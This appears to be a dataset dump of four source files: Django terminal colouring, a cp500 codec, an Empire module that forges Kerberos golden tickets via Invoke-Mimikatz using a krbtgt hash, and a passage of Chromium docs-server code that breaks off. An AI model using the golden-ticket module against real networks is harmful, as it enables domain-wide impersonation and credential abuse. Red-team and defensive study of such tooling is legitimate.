repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
loic/django | django/utils/termcolors.py | 87 | 7302 | """
termcolors.py
"""
from django.utils import six
# ANSI color codes: foreground colors are 30-37, background colors 40-47,
# in the order given by color_names.
color_names = ('black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white')
foreground = {color_names[x]: '3%s' % x for x in range(8)}
background = {color_names[x]: '4%s' % x for x in range(8)}

RESET = '0'
# ANSI display attribute codes, keyed by the option names accepted in `opts`.
opt_dict = {'bold': '1', 'underscore': '4', 'blink': '5', 'reverse': '7', 'conceal': '8'}


def colorize(text='', opts=(), **kwargs):
    """
    Returns your text, enclosed in ANSI graphics codes.

    Depends on the keyword arguments 'fg' and 'bg', and the contents of
    the opts tuple/list.

    Returns the RESET code if no parameters are given.

    Valid colors:
        'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'

    Valid options:
        'bold'
        'underscore'
        'blink'
        'reverse'
        'conceal'
        'noreset' - string will not be auto-terminated with the RESET code

    Examples:
        colorize('hello', fg='red', bg='blue', opts=('blink',))
        colorize()
        colorize('goodbye', opts=('underscore',))
        print(colorize('first line', fg='red', opts=('noreset',)))
        print('this should be red too')
        print(colorize('and so should this'))
        print('this should not be red')

    Raises KeyError if 'fg' or 'bg' names an unknown color; unknown entries
    in `opts` are silently ignored.
    """
    code_list = []
    if text == '' and len(opts) == 1 and opts[0] == 'reset':
        return '\x1b[%sm' % RESET
    # kwargs.items() iterates identically on Python 2 and 3; the previous
    # six.iteritems() call was an unnecessary Py2-only indirection.
    for k, v in kwargs.items():
        if k == 'fg':
            code_list.append(foreground[v])
        elif k == 'bg':
            code_list.append(background[v])
    for o in opts:
        if o in opt_dict:
            code_list.append(opt_dict[o])
    if 'noreset' not in opts:
        # Append the terminating RESET sequence unless explicitly disabled.
        text = '%s\x1b[%sm' % (text or '', RESET)
    return '%s%s' % (('\x1b[%sm' % ';'.join(code_list)), text or '')
def make_style(opts=(), **kwargs):
    """
    Returns a function with default parameters for colorize()

    Example:
        bold_red = make_style(opts=('bold',), fg='red')
        print(bold_red('hello'))
        KEYWORD = make_style(fg='yellow')
        COMMENT = make_style(fg='blue', opts=('bold',))
    """
    # Close over the given options so the returned callable styles any text
    # with this fixed configuration.
    def style_func(text):
        return colorize(text, opts, **kwargs)
    return style_func
# Names of the three built-in palettes selectable via DJANGO_COLORS.
NOCOLOR_PALETTE = 'nocolor'
DARK_PALETTE = 'dark'
LIGHT_PALETTE = 'light'

# For each palette, maps a Django role name to the keyword arguments that
# should be passed to colorize() when rendering that role.  The 'nocolor'
# palette maps every role to an empty definition (no styling).
PALETTES = {
    NOCOLOR_PALETTE: {
        'ERROR': {},
        'SUCCESS': {},
        'WARNING': {},
        'NOTICE': {},
        'SQL_FIELD': {},
        'SQL_COLTYPE': {},
        'SQL_KEYWORD': {},
        'SQL_TABLE': {},
        'HTTP_INFO': {},
        'HTTP_SUCCESS': {},
        'HTTP_REDIRECT': {},
        'HTTP_NOT_MODIFIED': {},
        'HTTP_BAD_REQUEST': {},
        'HTTP_NOT_FOUND': {},
        'HTTP_SERVER_ERROR': {},
        'MIGRATE_HEADING': {},
        'MIGRATE_LABEL': {},
    },
    DARK_PALETTE: {
        'ERROR': {'fg': 'red', 'opts': ('bold',)},
        'SUCCESS': {'fg': 'green', 'opts': ('bold',)},
        'WARNING': {'fg': 'yellow', 'opts': ('bold',)},
        'NOTICE': {'fg': 'red'},
        'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
        'SQL_COLTYPE': {'fg': 'green'},
        'SQL_KEYWORD': {'fg': 'yellow'},
        'SQL_TABLE': {'opts': ('bold',)},
        'HTTP_INFO': {'opts': ('bold',)},
        'HTTP_SUCCESS': {},
        'HTTP_REDIRECT': {'fg': 'green'},
        'HTTP_NOT_MODIFIED': {'fg': 'cyan'},
        'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
        'HTTP_NOT_FOUND': {'fg': 'yellow'},
        'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
        'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
        'MIGRATE_LABEL': {'opts': ('bold',)},
    },
    LIGHT_PALETTE: {
        'ERROR': {'fg': 'red', 'opts': ('bold',)},
        'SUCCESS': {'fg': 'green', 'opts': ('bold',)},
        'WARNING': {'fg': 'yellow', 'opts': ('bold',)},
        'NOTICE': {'fg': 'red'},
        'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
        'SQL_COLTYPE': {'fg': 'green'},
        'SQL_KEYWORD': {'fg': 'blue'},
        'SQL_TABLE': {'opts': ('bold',)},
        'HTTP_INFO': {'opts': ('bold',)},
        'HTTP_SUCCESS': {},
        'HTTP_REDIRECT': {'fg': 'green', 'opts': ('bold',)},
        'HTTP_NOT_MODIFIED': {'fg': 'green'},
        'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
        'HTTP_NOT_FOUND': {'fg': 'red'},
        'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
        'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
        'MIGRATE_LABEL': {'opts': ('bold',)},
    }
}

# Palette used when DJANGO_COLORS is unset or empty.
DEFAULT_PALETTE = DARK_PALETTE
def parse_color_setting(config_string):
    """Parse a DJANGO_COLORS environment variable to produce the system palette

    The general form of a palette definition is:

        "palette;role=fg;role=fg/bg;role=fg,option,option;role=fg/bg,option,option"

    where:
        palette is a named palette; one of 'light', 'dark', or 'nocolor'.
        role is a named style used by Django
        fg is a foreground color.
        bg is a background color.
        option is a display option.

    Specifying a named palette is the same as manually specifying the individual
    definitions for each role. Any individual definitions following the palette
    definition will augment the base palette definition.

    Valid roles:
        'error', 'notice', 'sql_field', 'sql_coltype', 'sql_keyword', 'sql_table',
        'http_info', 'http_success', 'http_redirect', 'http_bad_request',
        'http_not_found', 'http_server_error'

    Valid colors:
        'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'

    Valid options:
        'bold', 'underscore', 'blink', 'reverse', 'conceal'

    Returns a role -> definition dict, or None if the result is all-empty
    (i.e. equivalent to the 'nocolor' palette).
    """
    if not config_string:
        return PALETTES[DEFAULT_PALETTE]

    # Split the color configuration into parts
    parts = config_string.lower().split(';')
    # Start from (a shallow copy of) the nocolor palette so that every valid
    # role is present, then overlay whatever the config string specifies.
    palette = PALETTES[NOCOLOR_PALETTE].copy()
    for part in parts:
        if part in PALETTES:
            # A default palette has been specified
            palette.update(PALETTES[part])
        elif '=' in part:
            # Process a palette defining string
            definition = {}

            # Break the definition into the role,
            # plus the list of specific instructions.
            # The role must be in upper case
            role, instructions = part.split('=')
            role = role.upper()

            styles = instructions.split(',')
            # Reversed so .pop() yields the instructions in written order.
            styles.reverse()

            # The first instruction can contain a slash
            # to break apart fg/bg.
            colors = styles.pop().split('/')
            colors.reverse()
            fg = colors.pop()
            if fg in color_names:
                definition['fg'] = fg
            if colors and colors[-1] in color_names:
                definition['bg'] = colors[-1]

            # All remaining instructions are options
            opts = tuple(s for s in styles if s in opt_dict.keys())
            if opts:
                definition['opts'] = opts

            # The nocolor palette has all available roles.
            # Use that palette as the basis for determining
            # if the role is valid.
            if role in PALETTES[NOCOLOR_PALETTE] and definition:
                palette[role] = definition

    # If there are no colors specified, return the empty palette.
    if palette == PALETTES[NOCOLOR_PALETTE]:
        return None
    return palette
| bsd-3-clause |
maohongyuan/kbengine | kbe/res/scripts/common/Lib/encodings/cp500.py | 266 | 13121 | """ Python Character Mapping Codec cp500 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP500.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
    """Stateless cp500 (EBCDIC) charmap codec.

    Delegates to the C-implemented charmap codec using the module-level
    encoding_table / decoding_table built by gencodec.py.
    """

    def encode(self,input,errors='strict'):
        return codecs.charmap_encode(input,errors,encoding_table)

    def decode(self,input,errors='strict'):
        return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
    """Incremental encoder for cp500; charmap codecs carry no state."""

    def encode(self, input, final=False):
        # [0] drops the consumed-length part of the (output, length) tuple.
        return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
    """Incremental decoder for cp500; charmap codecs carry no state."""

    def decode(self, input, final=False):
        # [0] drops the consumed-length part of the (output, length) tuple.
        return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
    # Stream writer: inherits encode() from Codec, buffering from StreamWriter.
    pass
class StreamReader(Codec,codecs.StreamReader):
    # Stream reader: inherits decode() from Codec, buffering from StreamReader.
    pass
### encodings module API
def getregentry():
    """Return the CodecInfo entry used to register this codec as 'cp500'."""
    return codecs.CodecInfo(
        name='cp500',
        encode=Codec().encode,
        decode=Codec().decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
### Decoding Table
decoding_table = (
'\x00' # 0x00 -> NULL
'\x01' # 0x01 -> START OF HEADING
'\x02' # 0x02 -> START OF TEXT
'\x03' # 0x03 -> END OF TEXT
'\x9c' # 0x04 -> CONTROL
'\t' # 0x05 -> HORIZONTAL TABULATION
'\x86' # 0x06 -> CONTROL
'\x7f' # 0x07 -> DELETE
'\x97' # 0x08 -> CONTROL
'\x8d' # 0x09 -> CONTROL
'\x8e' # 0x0A -> CONTROL
'\x0b' # 0x0B -> VERTICAL TABULATION
'\x0c' # 0x0C -> FORM FEED
'\r' # 0x0D -> CARRIAGE RETURN
'\x0e' # 0x0E -> SHIFT OUT
'\x0f' # 0x0F -> SHIFT IN
'\x10' # 0x10 -> DATA LINK ESCAPE
'\x11' # 0x11 -> DEVICE CONTROL ONE
'\x12' # 0x12 -> DEVICE CONTROL TWO
'\x13' # 0x13 -> DEVICE CONTROL THREE
'\x9d' # 0x14 -> CONTROL
'\x85' # 0x15 -> CONTROL
'\x08' # 0x16 -> BACKSPACE
'\x87' # 0x17 -> CONTROL
'\x18' # 0x18 -> CANCEL
'\x19' # 0x19 -> END OF MEDIUM
'\x92' # 0x1A -> CONTROL
'\x8f' # 0x1B -> CONTROL
'\x1c' # 0x1C -> FILE SEPARATOR
'\x1d' # 0x1D -> GROUP SEPARATOR
'\x1e' # 0x1E -> RECORD SEPARATOR
'\x1f' # 0x1F -> UNIT SEPARATOR
'\x80' # 0x20 -> CONTROL
'\x81' # 0x21 -> CONTROL
'\x82' # 0x22 -> CONTROL
'\x83' # 0x23 -> CONTROL
'\x84' # 0x24 -> CONTROL
'\n' # 0x25 -> LINE FEED
'\x17' # 0x26 -> END OF TRANSMISSION BLOCK
'\x1b' # 0x27 -> ESCAPE
'\x88' # 0x28 -> CONTROL
'\x89' # 0x29 -> CONTROL
'\x8a' # 0x2A -> CONTROL
'\x8b' # 0x2B -> CONTROL
'\x8c' # 0x2C -> CONTROL
'\x05' # 0x2D -> ENQUIRY
'\x06' # 0x2E -> ACKNOWLEDGE
'\x07' # 0x2F -> BELL
'\x90' # 0x30 -> CONTROL
'\x91' # 0x31 -> CONTROL
'\x16' # 0x32 -> SYNCHRONOUS IDLE
'\x93' # 0x33 -> CONTROL
'\x94' # 0x34 -> CONTROL
'\x95' # 0x35 -> CONTROL
'\x96' # 0x36 -> CONTROL
'\x04' # 0x37 -> END OF TRANSMISSION
'\x98' # 0x38 -> CONTROL
'\x99' # 0x39 -> CONTROL
'\x9a' # 0x3A -> CONTROL
'\x9b' # 0x3B -> CONTROL
'\x14' # 0x3C -> DEVICE CONTROL FOUR
'\x15' # 0x3D -> NEGATIVE ACKNOWLEDGE
'\x9e' # 0x3E -> CONTROL
'\x1a' # 0x3F -> SUBSTITUTE
' ' # 0x40 -> SPACE
'\xa0' # 0x41 -> NO-BREAK SPACE
'\xe2' # 0x42 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
'\xe4' # 0x43 -> LATIN SMALL LETTER A WITH DIAERESIS
'\xe0' # 0x44 -> LATIN SMALL LETTER A WITH GRAVE
'\xe1' # 0x45 -> LATIN SMALL LETTER A WITH ACUTE
'\xe3' # 0x46 -> LATIN SMALL LETTER A WITH TILDE
'\xe5' # 0x47 -> LATIN SMALL LETTER A WITH RING ABOVE
'\xe7' # 0x48 -> LATIN SMALL LETTER C WITH CEDILLA
'\xf1' # 0x49 -> LATIN SMALL LETTER N WITH TILDE
'[' # 0x4A -> LEFT SQUARE BRACKET
'.' # 0x4B -> FULL STOP
'<' # 0x4C -> LESS-THAN SIGN
'(' # 0x4D -> LEFT PARENTHESIS
'+' # 0x4E -> PLUS SIGN
'!' # 0x4F -> EXCLAMATION MARK
'&' # 0x50 -> AMPERSAND
'\xe9' # 0x51 -> LATIN SMALL LETTER E WITH ACUTE
'\xea' # 0x52 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
'\xeb' # 0x53 -> LATIN SMALL LETTER E WITH DIAERESIS
'\xe8' # 0x54 -> LATIN SMALL LETTER E WITH GRAVE
'\xed' # 0x55 -> LATIN SMALL LETTER I WITH ACUTE
'\xee' # 0x56 -> LATIN SMALL LETTER I WITH CIRCUMFLEX
'\xef' # 0x57 -> LATIN SMALL LETTER I WITH DIAERESIS
'\xec' # 0x58 -> LATIN SMALL LETTER I WITH GRAVE
'\xdf' # 0x59 -> LATIN SMALL LETTER SHARP S (GERMAN)
']' # 0x5A -> RIGHT SQUARE BRACKET
'$' # 0x5B -> DOLLAR SIGN
'*' # 0x5C -> ASTERISK
')' # 0x5D -> RIGHT PARENTHESIS
';' # 0x5E -> SEMICOLON
'^' # 0x5F -> CIRCUMFLEX ACCENT
'-' # 0x60 -> HYPHEN-MINUS
'/' # 0x61 -> SOLIDUS
'\xc2' # 0x62 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
'\xc4' # 0x63 -> LATIN CAPITAL LETTER A WITH DIAERESIS
'\xc0' # 0x64 -> LATIN CAPITAL LETTER A WITH GRAVE
'\xc1' # 0x65 -> LATIN CAPITAL LETTER A WITH ACUTE
'\xc3' # 0x66 -> LATIN CAPITAL LETTER A WITH TILDE
'\xc5' # 0x67 -> LATIN CAPITAL LETTER A WITH RING ABOVE
'\xc7' # 0x68 -> LATIN CAPITAL LETTER C WITH CEDILLA
'\xd1' # 0x69 -> LATIN CAPITAL LETTER N WITH TILDE
'\xa6' # 0x6A -> BROKEN BAR
',' # 0x6B -> COMMA
'%' # 0x6C -> PERCENT SIGN
'_' # 0x6D -> LOW LINE
'>' # 0x6E -> GREATER-THAN SIGN
'?' # 0x6F -> QUESTION MARK
'\xf8' # 0x70 -> LATIN SMALL LETTER O WITH STROKE
'\xc9' # 0x71 -> LATIN CAPITAL LETTER E WITH ACUTE
'\xca' # 0x72 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
'\xcb' # 0x73 -> LATIN CAPITAL LETTER E WITH DIAERESIS
'\xc8' # 0x74 -> LATIN CAPITAL LETTER E WITH GRAVE
'\xcd' # 0x75 -> LATIN CAPITAL LETTER I WITH ACUTE
'\xce' # 0x76 -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
'\xcf' # 0x77 -> LATIN CAPITAL LETTER I WITH DIAERESIS
'\xcc' # 0x78 -> LATIN CAPITAL LETTER I WITH GRAVE
'`' # 0x79 -> GRAVE ACCENT
':' # 0x7A -> COLON
'#' # 0x7B -> NUMBER SIGN
'@' # 0x7C -> COMMERCIAL AT
"'" # 0x7D -> APOSTROPHE
'=' # 0x7E -> EQUALS SIGN
'"' # 0x7F -> QUOTATION MARK
'\xd8' # 0x80 -> LATIN CAPITAL LETTER O WITH STROKE
'a' # 0x81 -> LATIN SMALL LETTER A
'b' # 0x82 -> LATIN SMALL LETTER B
'c' # 0x83 -> LATIN SMALL LETTER C
'd' # 0x84 -> LATIN SMALL LETTER D
'e' # 0x85 -> LATIN SMALL LETTER E
'f' # 0x86 -> LATIN SMALL LETTER F
'g' # 0x87 -> LATIN SMALL LETTER G
'h' # 0x88 -> LATIN SMALL LETTER H
'i' # 0x89 -> LATIN SMALL LETTER I
'\xab' # 0x8A -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
'\xbb' # 0x8B -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
'\xf0' # 0x8C -> LATIN SMALL LETTER ETH (ICELANDIC)
'\xfd' # 0x8D -> LATIN SMALL LETTER Y WITH ACUTE
'\xfe' # 0x8E -> LATIN SMALL LETTER THORN (ICELANDIC)
'\xb1' # 0x8F -> PLUS-MINUS SIGN
'\xb0' # 0x90 -> DEGREE SIGN
'j' # 0x91 -> LATIN SMALL LETTER J
'k' # 0x92 -> LATIN SMALL LETTER K
'l' # 0x93 -> LATIN SMALL LETTER L
'm' # 0x94 -> LATIN SMALL LETTER M
'n' # 0x95 -> LATIN SMALL LETTER N
'o' # 0x96 -> LATIN SMALL LETTER O
'p' # 0x97 -> LATIN SMALL LETTER P
'q' # 0x98 -> LATIN SMALL LETTER Q
'r' # 0x99 -> LATIN SMALL LETTER R
'\xaa' # 0x9A -> FEMININE ORDINAL INDICATOR
'\xba' # 0x9B -> MASCULINE ORDINAL INDICATOR
'\xe6' # 0x9C -> LATIN SMALL LIGATURE AE
'\xb8' # 0x9D -> CEDILLA
'\xc6' # 0x9E -> LATIN CAPITAL LIGATURE AE
'\xa4' # 0x9F -> CURRENCY SIGN
'\xb5' # 0xA0 -> MICRO SIGN
'~' # 0xA1 -> TILDE
's' # 0xA2 -> LATIN SMALL LETTER S
't' # 0xA3 -> LATIN SMALL LETTER T
'u' # 0xA4 -> LATIN SMALL LETTER U
'v' # 0xA5 -> LATIN SMALL LETTER V
'w' # 0xA6 -> LATIN SMALL LETTER W
'x' # 0xA7 -> LATIN SMALL LETTER X
'y' # 0xA8 -> LATIN SMALL LETTER Y
'z' # 0xA9 -> LATIN SMALL LETTER Z
'\xa1' # 0xAA -> INVERTED EXCLAMATION MARK
'\xbf' # 0xAB -> INVERTED QUESTION MARK
'\xd0' # 0xAC -> LATIN CAPITAL LETTER ETH (ICELANDIC)
'\xdd' # 0xAD -> LATIN CAPITAL LETTER Y WITH ACUTE
'\xde' # 0xAE -> LATIN CAPITAL LETTER THORN (ICELANDIC)
'\xae' # 0xAF -> REGISTERED SIGN
'\xa2' # 0xB0 -> CENT SIGN
'\xa3' # 0xB1 -> POUND SIGN
'\xa5' # 0xB2 -> YEN SIGN
'\xb7' # 0xB3 -> MIDDLE DOT
'\xa9' # 0xB4 -> COPYRIGHT SIGN
'\xa7' # 0xB5 -> SECTION SIGN
'\xb6' # 0xB6 -> PILCROW SIGN
'\xbc' # 0xB7 -> VULGAR FRACTION ONE QUARTER
'\xbd' # 0xB8 -> VULGAR FRACTION ONE HALF
'\xbe' # 0xB9 -> VULGAR FRACTION THREE QUARTERS
'\xac' # 0xBA -> NOT SIGN
'|' # 0xBB -> VERTICAL LINE
'\xaf' # 0xBC -> MACRON
'\xa8' # 0xBD -> DIAERESIS
'\xb4' # 0xBE -> ACUTE ACCENT
'\xd7' # 0xBF -> MULTIPLICATION SIGN
'{' # 0xC0 -> LEFT CURLY BRACKET
'A' # 0xC1 -> LATIN CAPITAL LETTER A
'B' # 0xC2 -> LATIN CAPITAL LETTER B
'C' # 0xC3 -> LATIN CAPITAL LETTER C
'D' # 0xC4 -> LATIN CAPITAL LETTER D
'E' # 0xC5 -> LATIN CAPITAL LETTER E
'F' # 0xC6 -> LATIN CAPITAL LETTER F
'G' # 0xC7 -> LATIN CAPITAL LETTER G
'H' # 0xC8 -> LATIN CAPITAL LETTER H
'I' # 0xC9 -> LATIN CAPITAL LETTER I
'\xad' # 0xCA -> SOFT HYPHEN
'\xf4' # 0xCB -> LATIN SMALL LETTER O WITH CIRCUMFLEX
'\xf6' # 0xCC -> LATIN SMALL LETTER O WITH DIAERESIS
'\xf2' # 0xCD -> LATIN SMALL LETTER O WITH GRAVE
'\xf3' # 0xCE -> LATIN SMALL LETTER O WITH ACUTE
'\xf5' # 0xCF -> LATIN SMALL LETTER O WITH TILDE
'}' # 0xD0 -> RIGHT CURLY BRACKET
'J' # 0xD1 -> LATIN CAPITAL LETTER J
'K' # 0xD2 -> LATIN CAPITAL LETTER K
'L' # 0xD3 -> LATIN CAPITAL LETTER L
'M' # 0xD4 -> LATIN CAPITAL LETTER M
'N' # 0xD5 -> LATIN CAPITAL LETTER N
'O' # 0xD6 -> LATIN CAPITAL LETTER O
'P' # 0xD7 -> LATIN CAPITAL LETTER P
'Q' # 0xD8 -> LATIN CAPITAL LETTER Q
'R' # 0xD9 -> LATIN CAPITAL LETTER R
'\xb9' # 0xDA -> SUPERSCRIPT ONE
'\xfb' # 0xDB -> LATIN SMALL LETTER U WITH CIRCUMFLEX
'\xfc' # 0xDC -> LATIN SMALL LETTER U WITH DIAERESIS
'\xf9' # 0xDD -> LATIN SMALL LETTER U WITH GRAVE
'\xfa' # 0xDE -> LATIN SMALL LETTER U WITH ACUTE
'\xff' # 0xDF -> LATIN SMALL LETTER Y WITH DIAERESIS
'\\' # 0xE0 -> REVERSE SOLIDUS
'\xf7' # 0xE1 -> DIVISION SIGN
'S' # 0xE2 -> LATIN CAPITAL LETTER S
'T' # 0xE3 -> LATIN CAPITAL LETTER T
'U' # 0xE4 -> LATIN CAPITAL LETTER U
'V' # 0xE5 -> LATIN CAPITAL LETTER V
'W' # 0xE6 -> LATIN CAPITAL LETTER W
'X' # 0xE7 -> LATIN CAPITAL LETTER X
'Y' # 0xE8 -> LATIN CAPITAL LETTER Y
'Z' # 0xE9 -> LATIN CAPITAL LETTER Z
'\xb2' # 0xEA -> SUPERSCRIPT TWO
'\xd4' # 0xEB -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
'\xd6' # 0xEC -> LATIN CAPITAL LETTER O WITH DIAERESIS
'\xd2' # 0xED -> LATIN CAPITAL LETTER O WITH GRAVE
'\xd3' # 0xEE -> LATIN CAPITAL LETTER O WITH ACUTE
'\xd5' # 0xEF -> LATIN CAPITAL LETTER O WITH TILDE
'0' # 0xF0 -> DIGIT ZERO
'1' # 0xF1 -> DIGIT ONE
'2' # 0xF2 -> DIGIT TWO
'3' # 0xF3 -> DIGIT THREE
'4' # 0xF4 -> DIGIT FOUR
'5' # 0xF5 -> DIGIT FIVE
'6' # 0xF6 -> DIGIT SIX
'7' # 0xF7 -> DIGIT SEVEN
'8' # 0xF8 -> DIGIT EIGHT
'9' # 0xF9 -> DIGIT NINE
'\xb3' # 0xFA -> SUPERSCRIPT THREE
'\xdb' # 0xFB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
'\xdc' # 0xFC -> LATIN CAPITAL LETTER U WITH DIAERESIS
'\xd9' # 0xFD -> LATIN CAPITAL LETTER U WITH GRAVE
'\xda' # 0xFE -> LATIN CAPITAL LETTER U WITH ACUTE
'\x9f' # 0xFF -> CONTROL
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| lgpl-3.0 |
liorvh/Empire | lib/modules/credentials/mimikatz/golden_ticket.py | 9 | 5052 | from lib.common import helpers
class Module:
    """Empire module wrapper that builds an Invoke-Mimikatz golden-ticket
    PowerShell script.  (Python 2 source: print statements, iteritems.)"""

    def __init__(self, mainMenu, params=[]):
        # NOTE(review): mutable default argument `params=[]` — harmless here
        # because it is only iterated, but confirm no caller mutates it.

        # Static metadata describing this module to the Empire framework.
        self.info = {
            'Name': 'Invoke-Mimikatz Golden Ticket',

            'Author': ['@JosephBialek', '@gentilkiwi'],

            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "to generate a golden ticket and inject it into memory."),

            'Background' : True,

            'OutputExtension' : None,

            'NeedsAdmin' : False,

            'OpsecSafe' : True,

            'MinPSVersion' : '2',

            'Comments': [
                'http://clymb3r.wordpress.com/',
                'http://blog.gentilkiwi.com',
                "https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos"
            ]
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'CredID' : {
                'Description'   :   'CredID from the store to use for ticket creation.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'user' : {
                'Description'   :   'Username to impersonate.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'domain' : {
                'Description'   :   'The fully qualified domain name.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'sid' : {
                'Description'   :   'The SID of the specified domain.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'id' : {
                'Description'   :   'id to impersonate, defaults to 500.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'krbtgt' : {
                'Description'   :   'krbtgt NTLM hash for the specified domain',
                'Required'      :   False,
                'Value'         :   ''
            },
            'groups' : {
                'Description'   :   'Optional comma separated group IDs for the ticket.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'endin' : {
                'Description'   :   'Lifetime of the ticket (in minutes). Default to 10 years.',
                'Required'      :   False,
                'Value'         :   ''
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self):
        """Build and return the PowerShell script: Invoke-Mimikatz source plus
        a kerberos::golden command assembled from self.options.  Returns ""
        on any validation/read failure."""

        # read in the common module source code
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"

        try:
            f = open(moduleSource, 'r')
        except:
            # NOTE(review): bare except silently masks any open() failure mode.
            print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
            return ""

        moduleCode = f.read()
        f.close()

        script = moduleCode

        # if a credential ID is specified, try to parse
        credID = self.options["CredID"]['Value']
        if credID != "":
            if not self.mainMenu.credentials.is_credential_valid(credID):
                print helpers.color("[!] CredID is invalid!")
                return ""

            # Unpack the stored credential row; only a krbtgt credential is
            # usable for golden-ticket creation.
            (credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]

            if userName != "krbtgt":
                print helpers.color("[!] A krbtgt account must be used")
                return ""

            if domainName != "":
                self.options["domain"]['Value'] = domainName
            if sid != "":
                self.options["sid"]['Value'] = sid
            if password != "":
                self.options["krbtgt"]['Value'] = password

        if self.options["krbtgt"]['Value'] == "":
            # NOTE(review): only warns — execution continues and still builds
            # the command without a /krbtgt argument; confirm this is intended.
            print helpers.color("[!] krbtgt hash not specified")

        # build the golden ticket command
        script += "Invoke-Mimikatz -Command '\"kerberos::golden"

        # Every non-empty option except Agent/CredID becomes a /name:value
        # argument.  (Py2 dict iteration order is arbitrary here.)
        for option,values in self.options.iteritems():
            if option.lower() != "agent" and option.lower() != "credid":
                if values['Value'] and values['Value'] != '':
                    script += " /" + str(option) + ":" + str(values['Value'])

        script += " /ptt\"'"

        return script
| bsd-3-clause |
ltilve/chromium | chrome/common/extensions/docs/server2/render_refresher.py | 41 | 3514 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import posixpath
import traceback

from custom_logger import CustomLogger
from extensions_paths import EXAMPLES
from file_system_util import CreateURLsFromPaths
from future import Future
from render_servlet import RenderServlet
from special_paths import SITE_VERIFICATION_FILE
from timer import Timer
# Maps a refresh target name to (file system path, URL prefix).
_SUPPORTED_TARGETS = {
  'examples': (EXAMPLES, 'extensions/examples'),
}


# Module-scoped logger tagged 'render_refresher'.
_log = CustomLogger('render_refresher')
class _SingletonRenderServletDelegate(RenderServlet.Delegate):
  '''RenderServlet delegate that always hands back one fixed ServerInstance
  instead of creating a new one per request.'''

  def __init__(self, server_instance):
    self._server_instance = server_instance

  def CreateServerInstance(self):
    return self._server_instance
def _RequestEachItem(title, items, request_callback):
  '''Runs a task |request_callback| named |title| for each item in |items|.
  |request_callback| must take an item and return a servlet response.
  Returns true if every item was successfully run, false if any return a
  non-200 response or raise an exception.
  '''
  _log.info('%s: starting', title)
  success_count, failure_count = 0, 0
  timer = Timer()
  try:
    for i, item in enumerate(items):
      def error_message(detail):
        return '%s: error rendering %s (%s of %s): %s' % (
            title, item, i + 1, len(items), detail)
      try:
        response = request_callback(item)
        if response.status == 200:
          success_count += 1
        else:
          _log.error(error_message('response status %s' % response.status))
          failure_count += 1
      except Exception as e:
        # Fix: traceback is now imported at the top of the file; previously
        # this line raised a NameError whenever a callback failed, masking
        # the original exception.
        _log.error(error_message(traceback.format_exc()))
        failure_count += 1
        # NOTE(review): IsDeadlineExceededError is not imported in this file
        # (presumably from appengine_wrappers) — confirm against upstream.
        if IsDeadlineExceededError(e): raise
  finally:
    # Always log the summary, even if a deadline error aborted the loop.
    _log.info('%s: rendered %s of %s with %s failures in %s',
        title, success_count, len(items), failure_count,
        timer.Stop().FormatElapsed())
  return success_count == len(items)
class RenderRefresher(object):
  '''Used to refresh any set of renderable resources. Currently only supports
  assets related to extensions examples.'''

  def __init__(self, server_instance, request):
    self._server_instance = server_instance
    self._request = request

  def GetRefreshPaths(self):
    # The refreshable targets are the keys of _SUPPORTED_TARGETS.
    return _SUPPORTED_TARGETS.keys()

  def Refresh(self, path):
    def render(path):
      # NOTE(review): Request is not imported in this file (presumably from
      # servlet) — this would raise a NameError at runtime; confirm upstream.
      request = Request(path, self._request.host, self._request.headers)
